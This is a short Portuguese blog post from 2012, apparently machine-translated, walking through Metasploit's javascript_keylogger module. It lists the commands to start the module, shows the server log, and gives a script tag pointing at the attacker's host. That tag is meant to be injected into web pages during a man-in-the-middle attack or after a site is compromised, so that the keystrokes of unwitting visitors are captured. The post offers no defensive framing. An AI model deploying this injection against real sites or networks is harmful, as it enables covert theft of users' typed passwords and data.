[Metasploit] Como usar Módulo javascript_keylogger :D
Ele’ appena stato aggiunto a metasploit a forma:
javascript_keylogger
Este módulo é muito útil durante um MITM ou depois de inserir um sítio.
Vamos ver como usar :D
Ok, agora podemos prosseguir :D
Nós atualizamos Metasploit:
sudo msfupdate
Começamos Metasploit:
sudo msfconsole
Deixe a forma:
search javascript keylogger
Usar:
auxiliary/server/capture/javascript_keylogger
Agora vamos ver as opções:
show options
Uma vez que iniciar o servidor configurado :)
Primeiro lembre-se de parar algum servidor apache / web na porta 80:
sudo service apache2 stop
Executar e digite:
[*] Starting keylogger. Please press [CTRl]+[C] if you wish to terminate.
[*] Using URL: http://192.168.1.190:80/
[*] Server started.
[*] 192.168.1.190 - [05/Feb/2012:09:41:02 UTC] - [HTTP GET] - /metasploit
[*] 192.168.1.190 - [05/Feb/2012:09:41:02 UTC] - [HTTP GET] - /tOfpzuCWLJsM.js
[*] 192.168.1.190 - [05/Feb/2012:09:41:06 UTC] - [HTTP GET] - /tOfpzuCWLJsM.js
Bem, agora temos agora muitas maneiras de injetar javascript nas páginas da web que gera:
<script type="text/javascript" src="http://192.168.1.190:80/jstOfpzuCWLJsM.js"></script>
Eu sugiro o seguinte :D
[RUBY]Proxy Transparente && Injectar HTML / JavaScript
Ou podemos usar paros proxy ou ZEP :)
Arp envenenamento com scapy e pedido web falsificado com proxy paros em Backbox
Related posts:
- [Metasploit] Como adicionar módulo INSTÁVEL :)
- CVE-2010-3765: Mozilla Firefox remoto módulo Excution código para metasploit
- XSS: Mais potência com Carne de Metasploit
- [How-To]Metasploit && XSSF – Cross-Site Scripting Framework v.2.1
- [CVE-2010-2568]Metasploit:janelas Exuction Código Oday remoto
Esta entrada foi postada no domingo, 05 de fevereiro, 2012 em 9:56 am e está arquivada em GNU / Linux, Hacking, Software. Você pode acompanhar quaisquer respostas a esta entrada através do RSS 2.0 alimentar. Você pode deixar uma resposta, ou trackback a partir do seu próprio site.
Tagged com: metasploit • mitm
